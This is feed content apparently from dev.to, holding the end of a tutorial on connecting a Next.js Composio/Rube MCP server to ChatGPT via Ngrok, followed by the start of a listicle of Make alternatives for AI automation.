&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_API_KEY&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_API_KEY&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;For this demo, I'll be using Google Calendar, so head over to the Composio dashboard to access the auth config ID for Google Calendar.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create the auth config for Google Calendar.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyx8kyeo65y0jdk2ih0zb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyx8kyeo65y0jdk2ih0zb.png" alt="Composio Google Calendar Auth Config"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create an auth config for Google Calendar. Note the external user ID as we will use it in the &lt;code&gt;.env&lt;/code&gt; file.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Once done, copy the auth config ID (which starts with &lt;code&gt;ac_&lt;/code&gt;). Now, add the auth config ID and the user ID to the &lt;code&gt;.env&lt;/code&gt; file.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_USER_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_USER_ID&amp;gt;&lt;/span&gt;
&lt;span class="py"&gt;CALENDAR_AUTH_CONFIG_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_CALENDAR_AUTH_CONFIG_ID&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Your final &lt;code&gt;.env&lt;/code&gt; file should look something like this:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_API_KEY&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_API_KEY&amp;gt;&lt;/span&gt;
&lt;span class="py"&gt;COMPOSIO_USER_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_USER_ID&amp;gt;&lt;/span&gt;

&lt;span class="py"&gt;CALENDAR_AUTH_CONFIG_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_CALENDAR_AUTH_CONFIG_ID&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Install Dependencies and Start the Project
&lt;/h3&gt;

&lt;p&gt;Once your environment variables are configured, install the project dependencies:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pnpm &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;After installation is complete, start the project with:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pnpm run dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;By default, the app runs on port &lt;code&gt;3000&lt;/code&gt;. Double-check that it’s running on that port, as you’ll need this information later when setting up Ngrok.&lt;/p&gt;
&lt;h3&gt;
  
  
  Step-2: Expose Your App with Ngrok
&lt;/h3&gt;

&lt;p&gt;Since ChatGPT isn't running locally on your machine, you can't use &lt;code&gt;localhost:3000&lt;/code&gt; when connecting to the app in ChatGPT.&lt;/p&gt;

&lt;p&gt;You can host it on platforms like Vercel, but Ngrok is often faster and more convenient for development.&lt;/p&gt;

&lt;p&gt;Ngrok lets you share your local project via a temporary public URL, which is perfect for quick testing without redeploying.&lt;/p&gt;

&lt;p&gt;Even if you need to make changes, you won't have to push the changes to your repo to trigger the Vercel deployment. Ngrok can work directly from your local filesystem.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Install Ngrok&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure that you have &lt;a href="https://ngrok.com/" rel="noopener noreferrer"&gt;Ngrok&lt;/a&gt; installed on your machine.&lt;/p&gt;

&lt;p&gt;Visit this URL: &lt;a href="https://ngrok.com/" rel="noopener noreferrer"&gt;Ngrok Installation Guide&lt;/a&gt;, and find the relevant steps for your machine.&lt;/p&gt;

&lt;p&gt;If you're someone like me who prefers Docker, you can use the following command to pull the Ngrok public image from Docker Hub.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker pull ngrok/ngrok
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Use whichever installation method fits your workflow.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Start Ngrok&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure that the project is running locally and listening on port 3000, as we will be exposing it to the internet.&lt;/p&gt;

&lt;p&gt;It's as simple as typing out this command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ngrok http 3000 // Change to the port your app is running on
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;And if you've followed the Docker steps, run the following command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--net&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;host &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;NGROK_AUTHTOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;NGROK_AUTH_TOKEN&amp;gt; ngrok/ngrok:latest http 3000 // Change to the port your app is running on
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This will give you a public URL to access the project. Keep a note of this as we'll need it when setting up ChatGPT to add our new app.&lt;/p&gt;

&lt;p&gt;Make sure to replace &lt;code&gt;&amp;lt;NGROK_AUTH_TOKEN&amp;gt;&lt;/code&gt; with your actual ngrok auth token.&lt;/p&gt;

&lt;p&gt;You can find it in your Ngrok dashboard. Log in to your &lt;a href="https://dashboard.ngrok.com/" rel="noopener noreferrer"&gt;Ngrok&lt;/a&gt; account, and you'll find it in the dashboard.&lt;/p&gt;
&lt;h3&gt;
  
  
  Step 3: Connect Your App to ChatGPT
&lt;/h3&gt;

&lt;p&gt;Now, you should have a public URL for your app. Let's add it to ChatGPT.&lt;/p&gt;

&lt;p&gt;It should look something like this: &lt;a href="https://topographical-unmagnifying-halle.ngrok-free.dev/" rel="noopener noreferrer"&gt;&lt;code&gt;https://topographical-unmagnifying-halle.ngrok-free.dev&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Head over to ChatGPT settings, then under &lt;strong&gt;Additional Settings&amp;gt;&lt;/strong&gt; &lt;strong&gt;Apps and Connectors&lt;/strong&gt;, make sure &lt;strong&gt;Developer mode is turned on&lt;/strong&gt;. This gives you access to add your own application.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fid84q1zuwebagt8bq2as.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fid84q1zuwebagt8bq2as.png" alt="ChatGPT Developer Mode"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Create&lt;/strong&gt;, and fill in the following details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;MCP Server URL: The public URL you just got from Ngrok. Add &lt;code&gt;/mcp&lt;/code&gt; at the end, because that's the endpoint in our code that handles the requests from ChatGPT.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;For Name and Description, you can put anything you want (show your creativity!)&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Authentication: Select &lt;strong&gt;No Authentication&lt;/strong&gt;, as we'll handle authentication with Composio itself. Our app does not support OAuth by default.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv83tk9aqxk76vskyd046.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv83tk9aqxk76vskyd046.png" alt="ChatGPT Apps details"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  See It in Action
&lt;/h3&gt;

&lt;p&gt;Let's see how all of this adds up. Here's a quick demo to give you an idea of our application.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/hKjhxNT1_XM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Creating a Google Calendar meeting and viewing the details directly from GPT with widgets? That's really cool.&lt;/p&gt;
&lt;h2&gt;
  
  
  Advanced: How to use Rube MCP with the ChatGPT Apps SDK?
&lt;/h2&gt;

&lt;p&gt;You know what? You don’t need to worry about any of that if you don’t care about visual feedback or fancy widgets in ChatGPT. This is the right place to start.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 We only had to code all of that because I wanted to show you how to use Widgets with ChatGPT Apps + Rube MCP inside Next.js.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;None of the coding is necessary. The whole point of ChatGPT apps is to give you direct access to your applications right inside ChatGPT, so if you want all your apps ready to go without extra setup, this is perfect.&lt;/p&gt;

&lt;p&gt;Honestly, this is precisely what I’d recommend for your daily workflow. It’s simple, smooth, and gives you access to over 500 apps available on Rube. Pretty cool, right?&lt;/p&gt;

&lt;p&gt;Here’s all you need to do:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Make sure that you are in Developer Mode as we discussed earlier.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfbunk56n1slcsvsj0az.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfbunk56n1slcsvsj0az.png" alt="ChatGPT Developer Mode"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;In the same tab, click &lt;strong&gt;Create&lt;/strong&gt;, and fill in the following details:&lt;/li&gt;
&lt;li&gt;MCP Server URL: &lt;a href="https://rube.app/mcp" rel="noopener noreferrer"&gt;https://rube.app/mcp&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;For Name and Description, you can put anything you want (show your creativity!)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure you set up OAuth authentication, as we'll be using it to access the tools in ChatGPT.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9071v9md6dg2mcfuuvh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9071v9md6dg2mcfuuvh.png" alt="ChatGPT New Connector Creation"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, click on &lt;strong&gt;Create&lt;/strong&gt;.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It will now ask for some access; hit &lt;strong&gt;Allow&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwvzj0mfss2xb6myewee.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwvzj0mfss2xb6myewee.png" alt="ChatGPT asking app access"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If everything goes well, your app should be available on ChatGPT. Make sure that you see all six actions appropriately listed, as these are the core actions Rube uses to manage authentication, prepare tool calls, and stuff.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk15813imh8410dwbu66d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk15813imh8410dwbu66d.png" alt="ChatGPT with Rube - Connection success"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's all 6 Rube actions listed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;RUBE_CREATE_PLAN&lt;/code&gt;: Creates a complete step-by-step plan for LLMs.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_MULTI_EXECUTE_TOOL&lt;/code&gt;: Fast and parallel tool executor for tools discovered through &lt;code&gt;RUBE_SEARCH_TOOLS&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_REMOTE_BASH_TOOL&lt;/code&gt;: Execute bash commands in a REMOTE sandbox for file operations, data processing, and system tasks.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_REMOTE_WORKBENCH&lt;/code&gt;: Process remote files or script bulk tool executions using Python code in a remote sandbox.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_SEARCH_TOOLS&lt;/code&gt;: Search for tools to execute the user task.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_MANAGE_CONNECTIONS&lt;/code&gt;: Manage connection with Rube.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is to give you an idea of all the actions Rube will use to perform your tasks.&lt;/p&gt;

&lt;p&gt;And... that's it.&lt;/p&gt;

&lt;p&gt;Now, simply head over to your chat, use &lt;code&gt;@&amp;lt;APP_NAME&amp;gt;&lt;/code&gt;, in my case &lt;code&gt;@Rube MCP Server&lt;/code&gt;, and start talking.&lt;/p&gt;

&lt;p&gt;As an example, try saying this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"@ send an email to my ex at XYZ. Subject: Guess who. Body: Don’t worry, it’s just AI with Rube… or is it?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;(C’mon, try it, you’ll test two &lt;strong&gt;connections&lt;/strong&gt; at once. 😉 Just kidding…)&lt;/p&gt;


&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;Alright, now you’ve got a clear idea of how the ChatGPT Apps SDK works, how to set up a custom server powered by Rube, host it with Ngrok, and use it right inside ChatGPT or plug in Rube and get going without any coding at all if you don't care about widgets.&lt;/p&gt;

&lt;p&gt;In this post, we walked through everything from building your own custom server with Rube and widget support in Next.js to skipping the code entirely if you want to move fast.&lt;/p&gt;

&lt;p&gt;Well, that's all for this! I will see you in the next one.&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>🔥Top 10 Make alternatives for building AI automation 🤖</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Mon, 06 Oct 2025 15:07:39 +0000</pubDate>
      <link>https://forem.com/composiodev/top-10-make-alternatives-for-building-ai-automation-1jgc</link>
      <guid>https://forem.com/composiodev/top-10-make-alternatives-for-building-ai-automation-1jgc</guid>
      <description>&lt;p&gt;This article lists the top 10 &lt;a href="https://make.com/" rel="noopener noreferrer"&gt;Make&lt;/a&gt; alternatives for building AI automation that you should definitely check out in 2025! 🔥&lt;/p&gt;

&lt;p&gt;If you're into AI automation, these tools are a lifesaver. It does not matter if you're a developer or not; I'll list tools for both &lt;strong&gt;developers&lt;/strong&gt; and &lt;strong&gt;non-developers&lt;/strong&gt;, so feel free to choose whatever suits you.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyilegd5oya3t4vrehuih.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyilegd5oya3t4vrehuih.gif" alt="Pick one from many"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want to see the list, here’s each of the tools worth checking out 👇&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;For Developers&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://composio.dev/" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;: Connect your AI agent with 500+ apps and APIs using one SDK.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pipedream.com/" rel="noopener noreferrer"&gt;Pipedream&lt;/a&gt;: Deploy AI workflows in seconds with code-level control.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://merge.dev/" rel="noopener noreferrer"&gt;Merge&lt;/a&gt;: Unified API for syncing data and integrations across categories.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nango.dev/" rel="noopener noreferrer"&gt;Nango&lt;/a&gt;: Developer infra for managing 500+ API integrations.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://useparagon.com/" rel="noopener noreferrer"&gt;Paragon&lt;/a&gt;: Add prebuilt or custom integrations to your product fast.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;For Non-Developers&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://zapier.com/" rel="noopener noreferrer"&gt;Zapier&lt;/a&gt;: No-code automation with 8,000+ app connections.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;: Hosted MCP server that connects your AI tools to 500+ apps.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://n8n.io/" rel="noopener noreferrer"&gt;n8n&lt;/a&gt;: Open-source automation platform with full flexibility.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://langflow.org/" rel="noopener noreferrer"&gt;Langflow&lt;/a&gt;: Low-code AI builder for RAG and multi-agent apps.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://gumloop.com/" rel="noopener noreferrer"&gt;Gumloop&lt;/a&gt;: No-code platform to create AI workflows visually.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Each tool serves a different purpose, so be sure to check each one to see which best fits your needs. ✌️&lt;/p&gt;




&lt;h2&gt;
  
  
  Developer Friendly
&lt;/h2&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://composio.dev/" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Developer-first platform to connect AI agents with 500+ apps, APIs, and workflows.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F692q0a3rf28sbllleake.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F692q0a3rf28sbllleake.png" alt="Composio"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Composio is built for developers who want to connect their AI agent with 500+ apps, APIs, and workflows. It's a &lt;strong&gt;developer-first platform&lt;/strong&gt; and a bridge that gives your agent access to hundreds of SaaS apps, APIs, and workflows out of the box.&lt;/p&gt;

&lt;p&gt;Composio handles everything from building integrations, managing authentication &lt;strong&gt;per integration&lt;/strong&gt;, to optimizing JSON schema for agents, all of this in one call.&lt;/p&gt;

&lt;p&gt;Instead of manually building connectors for integrations (Slack, Notion, you name it...), you drop in Composio's SDK or API, and your agent can start taking action right away.&lt;/p&gt;

&lt;p&gt;With Composio, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Add 100+ ready-to-use integrations into your AI agent instantly.&lt;/li&gt;
&lt;li&gt;Expose APIs and tools in a structured way for LLMs (Claude, GPT, Gemini, etc.) to consume.&lt;/li&gt;
&lt;li&gt;Deploy production-ready agents faster without reinventing the wheel.&lt;/li&gt;
&lt;li&gt;Extend workflows by mixing prebuilt connectors with your own custom logic.&lt;/li&gt;
&lt;li&gt;There's a lot...&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It is a &lt;strong&gt;must&lt;/strong&gt; and the &lt;strong&gt;most reliable&lt;/strong&gt; in my experience if you're building agentic apps or automation products that need to talk to external services. Instead of wiring up OAuth, rate limits, and sync logic yourself, Composio handles that for you.&lt;/p&gt;

&lt;p&gt;Check out the &lt;a href="https://docs.composio.dev/docs/welcome" rel="noopener noreferrer"&gt;docs&lt;/a&gt; to get started, or jump straight in by installing their SDK in your project.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Quick Start:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install SDK (TypeScript)&lt;/span&gt;
npm &lt;span class="nb"&gt;install&lt;/span&gt; @composio/core

&lt;span class="c"&gt;# or (Python)&lt;/span&gt;
pip &lt;span class="nb"&gt;install &lt;/span&gt;composio
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Check out this demo to see Composio in action for Python. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/wkqlR8322F4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;For TypeScript, refer to this: &lt;a href="https://youtu.be/ZRGb4xGl-kc?si=xMxsXRDzDtYDG7p6" rel="noopener noreferrer"&gt;Getting Started with Composio using TypeScript&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 &lt;strong&gt;NOTE:&lt;/strong&gt; There’s Rube which is a part of Composio if you’re looking for somewhat similar for non-developers which I’ll cover in the next section.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  2. &lt;a href="https://pipedream.com/" rel="noopener noreferrer"&gt;Pipedream&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Prompt, run, and deploy AI agents in seconds.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8919p34c7tugt3kam1om.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8919p34c7tugt3kam1om.png" alt="Pipedream"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pipedream gives you a visual workflow builder &lt;em&gt;and&lt;/em&gt; lets you drop into code when you want to. It’s built for developers who want speed without losing control.&lt;/p&gt;

&lt;p&gt;Here’s what makes Pipedream useful:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It supports &lt;strong&gt;2,800+ apps and APIs&lt;/strong&gt;, so you can link your AI agents to many tools quickly.&lt;/li&gt;
&lt;li&gt;You can write custom logic in &lt;strong&gt;Node.js, Python, Go, or Bash&lt;/strong&gt; inside workflows whenever you need flexibility.&lt;/li&gt;
&lt;li&gt;It handles OAuth, tokens, and integrations so you don’t have to reinvent those common parts.&lt;/li&gt;
&lt;li&gt;For AI-heavy tasks, Pipedream offers &lt;strong&gt;code generation from prompts&lt;/strong&gt;, making it easier to spin up agent logic.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Check out this quick demo to see Pipedream in action. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/9Tan-MleeKQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  3. &lt;a href="https://merge.dev/" rel="noopener noreferrer"&gt;Merge&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Fast, secure integrations for your products and agents &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fld9748evh962dvm5dn5q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fld9748evh962dvm5dn5q.png" alt="Merge.dev"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Merge is all about simplifying integration. Instead of building connectors one by one, you use a &lt;strong&gt;single unified API&lt;/strong&gt;. Combine that with their MCP (Model Context Protocol) support, and your AI agent can read/write across many systems without you wiring each integration manually.&lt;/p&gt;

&lt;p&gt;Here’s how Merge helps you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It covers many categories like accounting, ticketing, CRM, file storage, and more with a common data model.&lt;/li&gt;
&lt;li&gt;You embed &lt;strong&gt;Merge Link&lt;/strong&gt; to let users link their accounts with apps you support. It handles auth, permissions, etc.&lt;/li&gt;
